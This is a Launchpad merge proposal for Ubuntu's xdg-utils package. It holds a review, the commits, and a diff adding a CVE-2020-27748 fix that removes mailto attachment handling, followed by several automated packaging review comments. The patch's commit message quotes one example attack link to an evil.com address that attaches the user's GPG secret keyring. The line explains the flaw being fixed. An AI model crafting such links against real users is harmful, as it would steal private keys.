Merge ~logan/ubuntu/+source/xdg-utils:merge into ubuntu/+source/xdg-utils:debian/sid

Proposed by Logan Rosen
Status: Needs review
Proposed branch: ~logan/ubuntu/+source/xdg-utils:merge
Merge into: ubuntu/+source/xdg-utils:debian/sid
Diff against target: 153 lines (+90/-3)
6 files modified
debian/changelog (+29/-0)
debian/control (+2/-1)
debian/patches/CVE-2020-27748.patch (+55/-0)
debian/patches/debian-changes (+2/-2)
debian/patches/series (+1/-0)
debian/xdg-utils.links (+1/-0)
Reviewer: Bryce Harrington (community), Status: Approve
Review via email: mp+400734@code.launchpad.net
Bryce Harrington (bryce) wrote:

I've confirmed the patch is still needed for this release of the package.

I would recommend adding DEP3 headers for the patch, specifically Origin, Bug-Ubuntu, and Bug-Debian (https://dep-team.pages.debian.net/deps/dep3/). The bug has already been raised with Debian at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975370, so that should be listed as Bug-Debian. It appears they are considering alternate solutions, but there has been no recent activity, it seems, so for now keeping the existing fix is the right course of action.

LGTM, +1

If you need sponsorship, let me know.

review: Approve

Unmerged commits

827b6c9... by Logan Rosen

finalize-changelog

e96cd62... by Logan Rosen

update-maintainer

66d873f... by Logan Rosen

reconstruct-changelog

76cc19a... by Logan Rosen

merge-changelogs

f790618... by Logan Rosen

Add debian/xdg-utils.links

   - Symlink /usr/bin/xdg-open to /usr/bin/browse (LP: #1624022)

337ea78... by Logan Rosen

SECURITY UPDATE: local file inclusion vulnerability

  - debian/patches/CVE-2020-27748.patch: remove attachment handling from
    mailto in scripts/xdg-email.in.
  - CVE-2020-27748

Preview Diff

1diff --git a/debian/changelog b/debian/changelog
2index 7780970..76df7b1 100644
3--- a/debian/changelog
4+++ b/debian/changelog
5@@ -1,3 +1,15 @@
6+xdg-utils (1.1.3-4ubuntu1) hirsute; urgency=medium
7+
8+ * Merge with Debian unstable. Remaining changes:
9+ - SECURITY UPDATE: local file inclusion vulnerability
10+ + debian/patches/CVE-2020-27748.patch: remove attachment handling from
11+ mailto in scripts/xdg-email.in.
12+ + CVE-2020-27748
13+ - Add debian/xdg-utils.links:
14+ + Symlink /usr/bin/xdg-open to /usr/bin/browse (LP #1624022)
15+
16+ -- Logan Rosen <logan@ubuntu.com> Wed, 07 Apr 2021 17:12:40 -0400
17+
18 xdg-utils (1.1.3-4) unstable; urgency=medium
19
20 * Set executable bit of the "ttyon" and the "ttyoff" utilities right before
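Review bot: the new 1.1.3-4ubuntu1 entry writes the bug reference as `LP #1624022` (no colon), while the 1.1.3-2ubuntu1 entry carried forward further down this changelog and the xdg-utils.links commit message both use `LP: #1624022`. Use the `LP: #` form so Launchpad recognises the reference and so the remaining-changes line matches the entry it was copied from.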
21@@ -34,6 +46,23 @@ xdg-utils (1.1.3-3) unstable; urgency=medium
22
23 -- Nicholas Guriev <guriev-ns@ya.ru> Sun, 10 Jan 2021 12:32:26 +0300
24
25+xdg-utils (1.1.3-2ubuntu2) hirsute; urgency=medium
26+
27+ * SECURITY UPDATE: local file inclusion vulnerability
28+ - debian/patches/CVE-2020-27748.patch: remove attachment handling from
29+ mailto in scripts/xdg-email.in.
30+ - CVE-2020-27748
31+
32+ -- Leonidas S. Barbosa <leo.barbosa@canonical.com> Tue, 24 Nov 2020 14:26:08 -0300
33+
34+xdg-utils (1.1.3-2ubuntu1) focal; urgency=medium
35+
36+ * Sync with Debian. Remaining change:
37+ - Add debian/xdg-utils.links:
38+ + Symlink /usr/bin/xdg-open to /usr/bin/browse (LP: #1624022)
39+
40+ -- Jeremy Bicha <jbicha@ubuntu.com> Sun, 29 Mar 2020 19:38:09 -0400
41+
42 xdg-utils (1.1.3-2) unstable; urgency=medium
43
44 [ Debian Janitor ]
45diff --git a/debian/control b/debian/control
46index 474ad23..bb7e0b7 100644
47--- a/debian/control
48+++ b/debian/control
49@@ -1,5 +1,6 @@
50 Source: xdg-utils
51-Maintainer: Debian freedesktop.org maintainers <pkg-freedesktop-maintainers@lists.alioth.debian.org>
52+Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
53+XSBC-Original-Maintainer: Debian freedesktop.org maintainers <pkg-freedesktop-maintainers@lists.alioth.debian.org>
54 Uploaders: Nicholas Guriev <guriev-ns@ya.ru>
55 Section: utils
56 Priority: optional
57diff --git a/debian/patches/CVE-2020-27748.patch b/debian/patches/CVE-2020-27748.patch
58new file mode 100644
59index 0000000..de04492
60--- /dev/null
61+++ b/debian/patches/CVE-2020-27748.patch
62@@ -0,0 +1,55 @@
63+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
64+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
65+Date: Tue, 18 Aug 2020 16:52:24 +0100
66+Subject: [PATCH] xdg-email: remove attachment handling from mailto
67+MIME-Version: 1.0
68+Content-Type: text/plain; charset=UTF-8
69+Content-Transfer-Encoding: 8bit
70+
71+This allows attacker to extract secrets from users:
72+
73+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
74+
75+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
76+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
77+
78+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
79+---
80+ scripts/xdg-email.in | 7 +------
81+ 1 file changed, 1 insertion(+), 6 deletions(-)
82+
83+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
84+index 6db58ad..5d2f4f3 100644
85+--- a/scripts/xdg-email.in
86++++ b/scripts/xdg-email.in
87+@@ -32,7 +32,7 @@ _USAGE
88+
89+ run_thunderbird()
90+ {
91+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
92++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
93+ THUNDERBIRD="$1"
94+ MAILTO=$(echo "$2" | sed 's/^mailto://')
95+ echo "$MAILTO" | grep -qs "^?"
96+@@ -48,7 +48,6 @@ run_thunderbird()
97+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
98+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
99+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
100+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
101+
102+ if [ -z "$TO" ] ; then
103+ NEWMAILTO=
104+@@ -68,10 +67,6 @@ run_thunderbird()
105+ NEWMAILTO="${NEWMAILTO},$BODY"
106+ fi
107+
108+- if [ -n "$ATTACH" ] ; then
109+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
110+- fi
111+-
112+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
113+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
114+ "$THUNDERBIRD" -compose "$NEWMAILTO"
115+--
116+GitLab
117+
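Review bot: the patch file carries only the git-format-patch headers (From/Date/Subject) and none of the DEP3 fields the review above asks for, so its provenance and bug links are not machine-readable. Add them above the `---` separator using values already present in the patch text, for example `Origin: upstream, 1f199813e0eb0246f63b54e9e154970e609575af`, `Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975370` and `Bug: https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177`, plus `Bug-Ubuntu:` if a Launchpad bug exists for it. The bare `GitLab` line after the trailing `--` sits outside the diff and is ignored by patch/quilt, so it is harmless, but it can be dropped when the headers are reworked.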
118diff --git a/debian/patches/debian-changes b/debian/patches/debian-changes
119index aceba81..82ef001 100644
120--- a/debian/patches/debian-changes
121+++ b/debian/patches/debian-changes
122@@ -475,7 +475,7 @@ repository.
123
124 --- xdg-utils-1.1.3.orig/scripts/xdg-email.in
125 +++ xdg-utils-1.1.3/scripts/xdg-email.in
126-@@ -91,13 +91,13 @@ open_kde()
127+@@ -86,13 +86,13 @@ open_kde()
128 fi
129
130 if which $kreadconfig >/dev/null 2>&1; then
131@@ -495,7 +495,7 @@ repository.
132
133 if echo "$client" | grep -Eq 'thunderbird|icedove'; then
134 run_thunderbird "$client" "$1"
135-@@ -472,7 +472,7 @@ case "$DE" in
136+@@ -467,7 +467,7 @@ case "$DE" in
137 open_gnome "${mailto}"
138 ;;
139
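Review bot: both hunks change only the line numbers inside debian-changes' own hunk headers (`@@ -91` to `@@ -86` and `@@ -472` to `@@ -467`). The offset of 5 matches the CVE patch's net change to scripts/xdg-email.in (1 insertion, 6 deletions per its diffstat), so the edit is internally consistent, but since this hand-adjusts a patch that Debian ships verbatim, please confirm with `quilt push -a` (or a `dpkg-source -x` of the built source package) that the whole series still applies without fuzz or offset warnings.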
140diff --git a/debian/patches/series b/debian/patches/series
141index 7bb8252..80f7a23 100644
142--- a/debian/patches/series
143+++ b/debian/patches/series
144@@ -1 +1,2 @@
145+CVE-2020-27748.patch
146 debian-changes
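Review bot: placing CVE-2020-27748.patch ahead of debian-changes is what forces the debian-changes hunk headers to be rewritten in this same merge, and that rewrite has to be redone on every future sync. The CVE patch edits scripts/xdg-email.in inside run_thunderbird (its hunks are at lines 32, 48 and 68), while the two debian-changes hunks shown in this diff touch that file at open_kde (line 86/91) and at the `case "$DE"` block (line 467/472), both below the region the CVE patch removes. Listing the CVE patch after debian-changes should therefore leave debian-changes byte-identical to Debian's copy and still apply cleanly; verify with `quilt push -a` before switching the order.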
147diff --git a/debian/xdg-utils.links b/debian/xdg-utils.links
148new file mode 100644
149index 0000000..c87b9d2
150--- /dev/null
151+++ b/debian/xdg-utils.links
152@@ -0,0 +1 @@
153+/usr/bin/xdg-open /usr/bin/browse
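Review bot: this installs /usr/bin/browse as a symlink to /usr/bin/xdg-open, claiming a generic command name in /usr/bin with no Conflicts/Replaces or alternatives handling anywhere else in the diff. Before upload, check that no other package in the target archive ships a /usr/bin/browse (for example with `apt-file search /usr/bin/browse`), since a plain .links entry will fail to unpack on a file conflict rather than resolve it.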
